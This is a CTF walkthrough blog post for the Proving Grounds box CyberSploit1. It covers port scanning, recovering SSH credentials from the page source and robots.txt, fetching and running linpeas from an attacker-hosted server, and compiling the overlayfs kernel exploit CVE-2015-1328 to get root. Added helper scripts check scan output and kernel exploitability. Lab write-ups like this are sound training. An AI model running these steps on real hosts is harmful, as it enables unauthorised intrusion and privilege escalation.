Proving Grounds Play: CyberSploit1 Walkthrough

Sanaullah Aman Korai
4 min read · Aug 5, 2023

In this write-up, we'll walk through the steps taken to solve this Capture The Flag (CTF) box, from initial enumeration to privilege escalation.

Enumeration Phase: Upon conducting an initial Nmap scan, two open ports were identified on the target machine: SSH on port 22 and HTTP on port 80. Further investigation revealed the presence of a web page, which led to the discovery of a username: “itsskv.”

Web Enumeration: After extensively searching the web directories, the most notable finding was the “robots.txt” file. Within this file, an encoded string was uncovered, which, when decoded, revealed the password: “cybersploit{youtube.com/c/cybersploit}.” Armed with both the username and password, an SSH connection was established successfully.

Privilege Escalation: Once on the target, initial enumeration showed that the current user has no sudo privileges. The next step was to transfer the "linpeas.sh" script from the attacker's machine to the victim: a Python web server on the attacker's side and "wget" on the victim's side. The script was made executable and run, and its exploit-suggester section reported that the kernel (3.13.0-32-generic on Ubuntu 12.04) is vulnerable to the overlayfs privilege-escalation bugs CVE-2015-1328 and CVE-2015-8660.

Exploitation and Privilege Escalation: Exploit Database entry 37292 (CVE-2015-1328, overlayfs) was selected, compiled on the target and executed. This gave a root shell and therefore full administrative access to the machine.

First things first: run an nmap scan to see which ports are open and which services are listening on them.

Nmap scan report for 192.168.173.92
Host is up (0.15s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp    open     http        Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
1272/tcp  filtered cspmlockmgr
2700/tcp  filtered tqdata
3098/tcp  filtered umm-port
9951/tcp  filtered apc-9951
14733/tcp filtered unknown
39439/tcp filtered unknown
39648/tcp filtered unknown
50435/tcp filtered unknown
62127/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.86 seconds

So there are two open ports: 22 (SSH) and 80 (HTTP). The handful of filtered ports is almost certainly noise: "conn-refused" tells us this was an unprivileged connect scan, and over a VPN link a few probes simply time out. Let's enumerate the web page first.
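To turn a full-port scan like the one above into something the next step can consume, here is an added example (not part of the original write-up) that parses nmap's normal output, lists the open ports with their banners, builds the port list for a follow-up script scan, and reports the filtered ports separately. The sample scan text is constructed from the output above; the `nmap -p- -sV -oN` invocation in the comment is an assumption, since the write-up does not show the exact command used.

```shell
#!/bin/sh
# Added example, not from the original write-up: pull open ports and service
# banners out of nmap's normal (-oN) output. SAMPLE_SCAN is constructed from the
# scan shown above; on a live target you would produce the file with something
# like (flags assumed):  nmap -p- -sV -oN scan.txt 192.168.173.92

SAMPLE_SCAN='Nmap scan report for 192.168.173.92
Host is up (0.15s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT      STATE    SERVICE      VERSION
22/tcp    open     ssh          OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http         Apache httpd 2.2.22 ((Ubuntu))
1272/tcp  filtered cspmlockmgr
2700/tcp  filtered tqdata
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel'

# open_ports <scan text>: one "port/proto service version" line per open port.
# Only lines whose first field looks like 22/tcp are port rows, so the
# "Not shown"/"Service Info" lines and script output (| ...) are skipped.
open_ports() {
    printf '%s\n' "$1" | awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
        port = $1; svc = $3
        $1 = $2 = $3 = ""; sub(/^ +/, "")
        printf "%s %s %s\n", port, svc, $0
    }'
}

# open_port_numbers <scan text>: comma-separated list ready for -p, e.g.
#   nmap -sC -sV -p "$(open_port_numbers "$scan")" 192.168.173.92
open_port_numbers() {
    open_ports "$1" | cut -d/ -f1 | paste -s -d ',' -
}

# filtered_ports <scan text>: ports that never answered. In a connect scan these
# are usually timeouts on a lossy link rather than a firewall rule, so they are
# reported for the notes but not treated as targets.
filtered_ports() {
    printf '%s\n' "$1" | awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "filtered" { print $1 }' \
        | paste -s -d ',' -
}

# Run as a script: use the scan file given as the first argument, else the sample.
if [ "$#" -ge 1 ]; then
    scan="$(cat "$1")"
else
    scan="$SAMPLE_SCAN"
fi
echo "open ports:"
open_ports "$scan"
echo "follow-up -p list: $(open_port_numbers "$scan")"
echo "filtered (likely noise): $(filtered_ports "$scan")"
```

Running it without arguments prints the two open services from the sample, `22,80` as the follow-up port list and `1272/tcp,2700/tcp` as the filtered set; pass a saved `-oN` file as the first argument to run it against a real scan.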

The site itself has no useful features, so let's check the page source.

That gives us a username: itsskv. Now let's dig deeper into the website by fuzzing for directories.

Fuzzing turned up a lot of directories and I visited almost every one of them, but nothing interesting came up except robots.txt.

It contains a base64-encoded string. Let's decode it and see what it is.

echo -n “Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=” | base64 -d

cybersploit{youtube.com/c/cybersploit}

This is most probably the password: cybersploit{youtube.com/c/cybersploit}. Now that we have both a username and a password for the box, let's try to SSH in.

ssh itsskv@192.168.173.92

ssh itsskv@cybersploit
itsskv@cybersploit's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

* Documentation: https://help.ubuntu.com/

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Your Hardware Enablement Stack (HWE) is supported until April 2017.

itsskv@cybersploit-CTF:~$

We're in. Let's submit the local flag and move on to privilege escalation. This user is not in the sudoers file, so I transferred linpeas.sh to the victim machine: start a Python web server on the attacker machine, then download and run the script on the victim.

Attacker Machine:

python3 -m http.server 80

Victim machine:

wget http://vpn-ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

After running linpeas, its exploit-suggester section reports that this kernel version is vulnerable to the overlayfs CVEs.

╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[2] overlayfs
CVE-2015-8660
Source: http://www.exploit-db.com/exploits/39230
[3] pp_key
CVE-2016-0728
Source: http://www.exploit-db.com/exploits/39277
[4] timeoutpwn
CVE-2014-0038
Source: http://www.exploit-db.com/exploits/31346
[+] [CVE-2015-1328] overlayfs
Details: http://seclists.org/oss-sec/2015/q2/717
Exposure: highly probable
Tags: [ ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic} ],ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
Download URL: https://www.exploit-db.com/download/37292
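Before compiling a kernel exploit on a target it is worth confirming by hand what the suggester matched on. The added example below (not from the original write-up) reproduces the CVE-2015-1328 version match from the tag printed above and adds the precondition check an overlayfs exploit needs: that the kernel actually exposes overlayfs. The function names are mine, and it assumes the suggester's `*` in the tag is a plain wildcard; the values 12.04 and 3.13.0-32-generic come from the SSH banner above.

```shell
#!/bin/sh
# Added example, not from the original write-up: two checks to run before
# building an overlayfs exploit on the target.
#
# 1. overlayfs_1328_match reproduces the kernel/release tag that
#    linux-exploit-suggester printed for CVE-2015-1328:
#      ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic}
#      ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
#    (assumption: the tag's "*" is a plain wildcard, so 3.13.0-32-generic matches).
# 2. overlayfs_supported checks that the kernel lists the filesystem in
#    /proc/filesystems (3.x kernels call it "overlayfs", later ones "overlay").
#
# Both take their input as arguments so they can be run on copied values or live:
#   overlayfs_1328_match "$(lsb_release -rs)" "$(uname -r)"
#   overlayfs_supported "$(cat /proc/filesystems)"

# overlayfs_1328_match <ubuntu release> <kernel release>
# Prints "match" and returns 0 when the pair is inside the tag, otherwise
# prints "no-match" and returns 1.
overlayfs_1328_match() {
    release="$1"
    kernel="$2"
    case "$release" in
        12.04|14.04)
            case "$kernel" in
                3.13.0-[2345]*-generic) echo match; return 0 ;;
            esac
            ;;
        14.10|15.04)
            case "$kernel" in
                3.13.0-*-generic|3.16.0-*-generic) echo match; return 0 ;;
            esac
            ;;
    esac
    echo no-match
    return 1
}

# overlayfs_supported <contents of /proc/filesystems>
# Returns 0 when an overlay/overlayfs line is present. A miss does not rule the
# exploit out completely (the filesystem may still be loadable as a module),
# but a hit confirms the mount the exploit relies on is at least available.
overlayfs_supported() {
    printf '%s\n' "$1" | grep -Eq '(^|[[:space:]])(overlay|overlayfs)$'
}

# Invoke with --live on the target itself to report both checks.
if [ "${1:-}" = "--live" ]; then
    overlayfs_1328_match "$(lsb_release -rs 2>/dev/null)" "$(uname -r)"
    if overlayfs_supported "$(cat /proc/filesystems)"; then
        echo "overlayfs: listed in /proc/filesystems"
    else
        echo "overlayfs: not listed in /proc/filesystems (may still load as a module)"
    fi
fi
```

For the values in this box's banner, `overlayfs_1328_match 12.04 3.13.0-32-generic` prints `match`, while a patched 14.04 kernel such as 3.13.0-65-generic does not. Run the file with `--live` on the target to get both answers for the real host before spending time on compilation.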

I tried http://www.exploit-db.com/exploits/37292 (CVE-2015-1328) and it worked. It has to be compiled on the target, so gcc must be present there, as it is on this box. Note from the output that the exploit stages its payload through /etc/ld.so.preload, so once you have your root shell, check that the file has not been left behind.

itsskv@cybersploit-CTF:~$ gcc 37292.c -o exploit
itsskv@cybersploit-CTF:~$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(itsskv)

We have rooted the box. Stay tuned for the next write-up.
